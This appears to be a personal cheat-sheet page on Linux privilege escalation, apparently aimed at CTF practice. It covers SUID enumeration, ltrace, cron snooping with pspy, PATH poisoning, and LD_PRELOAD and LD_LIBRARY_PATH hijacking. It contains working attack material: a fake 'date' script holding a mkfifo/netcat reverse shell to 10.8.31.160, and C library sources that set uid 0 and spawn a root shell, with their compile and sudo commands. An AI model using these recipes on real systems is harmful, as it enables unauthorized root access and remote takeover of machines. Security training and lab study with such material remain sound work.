Skip to content

Priviliage Escalation

Looking into Files

Searching necessery files is vital to find a way for priviliage escalation.

tree

tree is a useful file lister recursively. 

tree [dir]

find

On some systems, tree is not installed. To find files that may be useful, we need tree-like results. 

find [directory] -maxdepth 1 -type d -exec sh -c 'echo -n "$(basename "{}"): "; find "{}" -type f 2>/dev/null | wc -l' \;

Current directory 

find . -maxdepth 1 -type d -exec sh -c 'echo -n "$(basename "{}"): "; find "{}" -type f 2>/dev/null | wc -l' \;

SUID or SGID

Finding files with the setuid (SUID) or setgid (SGID) permission can be a security concern because these permissions can potentially lead to vulnerabilities or exploits. Here are a few examples of the risks associated with SUID and SGID executables:

It's important to regularly audit and review SUID and SGID files on a system, understand their purpose, and ensure that they are secure. The find /bin -perm -4000 command is often used as part of such an audit to identify potentially risky files with elevated permissions. If you discover any SUID or SGID executables that are unnecessary or could pose a security risk, consider either adjusting their permissions or removing them, depending on your system's requirements.

find /bin -perm -4000

Alternatively; 

find / -perm -u=s -type f 2>/dev/null

Itrace

To inspect how a binary process run, you can use ltrace command. 

ltrace /usr/sbin/checker

Path Poisoning

Change Path variable; 

PATH=/tmp:$PATH

Create a script to exploit suid; 

echo "#!/bin/sh" > date
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.31.160 1111 >/tmp/f" >> date

Get the shell; 

./suid_binary

Cron Jobs

Cron jobs are scheduled tasks that run at specific times or intervals on a system. They are often used to automate repetitive tasks, such as backups, system maintenance, or data processing. Cron jobs are defined in crontab files, which are configuration files that specify the schedule and command to be executed.

Cron jobs can be a potential security risk if they are misconfigured or if they execute commands with elevated privileges. Attackers may abuse cron jobs to gain unauthorized access to a system, escalate privileges, or execute malicious code.

pspy - unprivileged Linux process snooping

pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems in CTFs. Also great to demonstrate your colleagues why passing secrets as arguments on the command line is a bad idea.

The tool gathers the info from procfs scans. Inotify watchers placed on selected parts of the file system trigger these scans to catch short-lived processes.

Some examples:

# print both commands and file system events and scan procfs every 1000 ms (=1sec)
./pspy64 -pf -i 1000 

# place watchers recursively in two directories and non-recursively into a third
./pspy64 -r /path/to/first/recursive/dir -r /path/to/second/recursive/dir -d /path/to/the/non-recursive/dir

# disable printing discovered commands but enable file system events
./pspy64 -p=false -f

PE with LD_PRELOAD

LD_PRELOAD is an environment variable that specifies a list of additional, user-specified, ELF shared libraries to be loaded before all others. This can be used to inject code into a process, such as overriding functions in a shared library, or to execute arbitrary code before the main program starts.

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD"); // Unset LD_PRELOAD to avoid infinite loop
setgid(0);
setuid(0);
system("/bin/sh");
}

Compile and run the code; 

gcc -fPIC -shared -o shell.so shell.c -nostartfiles
ls -al shell.so
sudo LD_PRELOAD=/home/saad/shell.so find

whoami
root

PE with LD_LIBRARY_PATH

The LD_LIBRARY_PATH contains a list of directories which search for shared libraries first.

Use ldd to find the shared libraries;

$ ldd /usr/sbin/apache2
        [...]
        libcrypt.so.1 => /lib/x86_64-linux-gnu/libcrypt.so.1 (0x00007f4de794b000)
        [...]

Create a shared library with the same name; 

// evil.c
#include <stdio.h>
#include <stdlib.h>

static void hijack() __attribute__((constructor));

void hijack() {
        unsetenv("LD_LIBRARY_PATH");
        setresuid(0,0,0);
        system("/bin/bash -p");
}

Compile and run the code; 

gcc -o /tmp/libcrypt.so.1 -shared -fPIC evil.c

sudo LD_LIBRARY_PATH=/tmp  /usr/sbin/apache2 -f /etc/apache2/apache2.conf -d /etc/apache2